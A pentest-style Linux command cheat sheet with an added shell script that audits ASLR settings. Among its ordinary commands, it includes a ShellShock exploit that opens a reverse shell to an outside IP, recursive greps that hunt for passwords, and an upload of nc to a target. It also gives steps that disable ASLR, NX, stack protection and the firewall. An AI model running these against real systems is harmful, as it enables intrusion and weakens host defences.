Useful Commands - Linux

Create a file on Linux:

echo "hello" > /tmp/file.txt
echo "hello" | dd of=/tmp/test.txt
cp /dev/stdin /tmp/file.txt <<< "hello world"
printf "hello\n" >> /tmp/test.txt
sed -i '$ a\hello' /tmp/test.txt

Delete the contents of a file on Linux:

>/tmp/file.log
:>/tmp/file.log
cat /dev/null > /tmp/file.log
cp /dev/null > /tmp/file.log   # cp itself fails (no destination operand); the shell redirection is what empties the file
cp /dev/null /tmp/file.log
dd if=/dev/null of=/tmp/file.log
echo -n > /tmp/file.log
truncate -s 0 /tmp/file.log
ex +%d -scwq /tmp/file.log
vi +%d -escwq /tmp/file.log
install -m600 /dev/null /tmp/file.log

Spawn an interactive PTY from a shell using Python

python -c 'import pty; pty.spawn("/bin/bash");'

Base64-encode a string

echo "hello world" | base64 -

Base64-decode a string

echo "aGVsbG8gd29ybGQK" | base64 -d -

Find text in files recursively

grep --exclude-dir={sys,proc,boot,dev,lost+found} -rnw '/' -e "password =" 2>/dev/null

List all files containing a certain string

find / -type f -exec grep -l "passw" {} + 2>/dev/null

Bash loop example

for i in $(seq 1 5);do echo 10.10.10.$i;done

Search and replace text in file

sed -i 's/OLD/NEW/g' /tmp/test
sed -i 's#OLD#NEW#g' /tmp/test
ex -sc '%s/OLD/NEW/g|x' /tmp/test
perl -e 's/OLD/NEW/g' -pi /tmp/test
awk -i inplace '{gsub("OLD", "NEW")}1' /tmp/test   # -i inplace requires gawk 4.1 or later

To replace text only if text is found on the 4th line

sed -i '4s/OLD/NEW/g' /tmp/test
gawk -i inplace 'NR==4{gsub(/OLD/,"NEW")}1' /tmp/test
perl -i -pe 's/OLD/NEW/g if $.==4' /tmp/test

Compile (simple) Windows binaries on Linux

wine gcc -o revshell.exe revshell.c -lwsock32 -lws2_32

Upload to website via curl POST or PUT

curl -X POST -F "file=@/bin/nc" "http://10.10.10.10:9999/upload"
curl -X PUT -F "file=@/bin/nc" "http://10.10.10.10:9999/upload"

Test and exploit ShellShock / Bash bug:

env X='() { :; }; echo "CVE-2014-6271 vulnerable"' bash -c id
curl -H 'x: () { :;}; /bin/bash -i >& /dev/tcp/20.20.20.20/9999 0>&1' http://10.10.10.10/cgi-bin/admin.cgi

Change password:

(echo 'root:passwd'|chpasswd)

Find common Windows OS Return Addresses (RetAddr) in exploitdb:

for file in $(fgrep -r -l -i "jmp esp" /usr/share/exploitdb/*); do grep -i "jmp esp" $file; done | sort -u | grep -i "xp sp2"

Convert Assembly instruction to byte value:

echo -ne "[BITS 32]\nJMP EAX">b32.asm;nasm b32.asm;ndisasm -b 32 b32;rm b32.asm b32

Turn off ASLR until next reboot:

sudo echo 0 > /proc/sys/kernel/randomize_va_space   # only works if you are already root: sudo applies to echo, not to the redirection
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
sudo sysctl -w kernel.randomize_va_space=0

Turn off NX until next reboot:

sudo sysctl -w kernel.exec-shield=0   # exec-shield is a Red Hat/CentOS-specific sysctl; it does not exist on mainline kernels

Turn off ASLR and NX permanently:

echo 'kernel.randomize_va_space = 0' | sudo tee -a /etc/sysctl.conf   # 'sudo echo ... >> file' fails: the redirection runs as the unprivileged user
echo 'kernel.exec-shield = 0' | sudo tee -a /etc/sysctl.conf          # Red Hat/CentOS-specific key, see above
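An added POSIX sh example (not part of the original cheat sheet) that audits the two places the commands above change: the runtime value in /proc/sys/kernel/randomize_va_space and a persistent override in /etc/sysctl.conf. The function names are mine; the file paths are the real ones.

```shell
#!/bin/sh
# Audit whether ASLR has been lowered at runtime or persistently.
# Added example; function names are hypothetical, paths are the real ones.

# Print the effective value of a key (e.g. kernel.randomize_va_space) from
# sysctl.conf-style text on stdin. sysctl ignores lines starting with '#' or
# ';', accepts '/' as well as '.' in keys, and lets the last assignment win.
sysctl_conf_value() {
    awk -v key="$1" -F= '
        /^[ \t]*[#;]/ || NF < 2 { next }
        {
            k = $1; v = $2
            gsub(/\//, ".", k)
            gsub(/^[ \t]+|[ \t]+$/, "", k)
            gsub(/^[ \t]+|[ \t]+$/, "", v)
        }
        k == key { val = v }
        END { if (val != "") print val }'
}

# Runtime setting: 2 = full ASLR, 1 = partial, 0 = off. Empty on non-Linux.
aslr_runtime() {
    cat /proc/sys/kernel/randomize_va_space 2>/dev/null
}

# Return 0 when ASLR is fully enabled and no persistent override lowers it;
# otherwise print each finding and return 1. Optional arg: config file path.
aslr_audit() {
    conf="${1:-/etc/sysctl.conf}"
    rc=0
    run=$(aslr_runtime)
    if [ -n "$run" ] && [ "$run" != 2 ]; then
        echo "FINDING: runtime kernel.randomize_va_space=$run (expected 2)"
        rc=1
    fi
    if [ -r "$conf" ]; then
        persist=$(sysctl_conf_value kernel.randomize_va_space < "$conf")
        if [ -n "$persist" ] && [ "$persist" != 2 ]; then
            echo "FINDING: $conf sets kernel.randomize_va_space=$persist"
            rc=1
        fi
    fi
    return $rc
}
```

Run `aslr_audit` as-is to check the live host, or pass a copied sysctl.conf to check an image offline.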

GCC Compiler flag to turn off NX bit:

-z execstack

GCC Compiler: Turn off stack smashing protection:

-fno-stack-protector

GCC Compiler: Turn off all protections:

-fno-stack-protector -z execstack -mpreferred-stack-boundary=2 -O0   # modern GCC also builds PIE by default; add -no-pie for fixed load addresses

IPTables:

iptables -F                                                 # Remove all firewall rules
iptables -A INPUT -p tcp --destination-port 4444 -j ACCEPT  # Allow TCP/4444

Run an executable that does not have the eXecutable permission set:

root@kali:~# cp /bin/uname /tmp/
root@kali:~# chmod -x /tmp/uname
root@kali:~# ls -al /tmp/uname
-rw-r--r-- 1 root root 31424 Sep 30 14:13 /tmp/uname
root@kali:~# $(find / -name 'ld-linux*.so*' -print -quit 2> /dev/null) /tmp/uname -a
Linux kali 4.14.0-kali3-amd64 #1 SMP Debian 4.14.17-1kali1 (2018-02-16) x86_64 GNU/Linux
root@kali:~#

Display the contents of a file named '.' in the current directory:

root@kali:~# ls -ali
92675612 -rw-rw-r--   1 root root    57 Sep 28 08:34 .
root@kali:~# find . -inum 92675612 -exec cat {} \;
this is the content of the file named .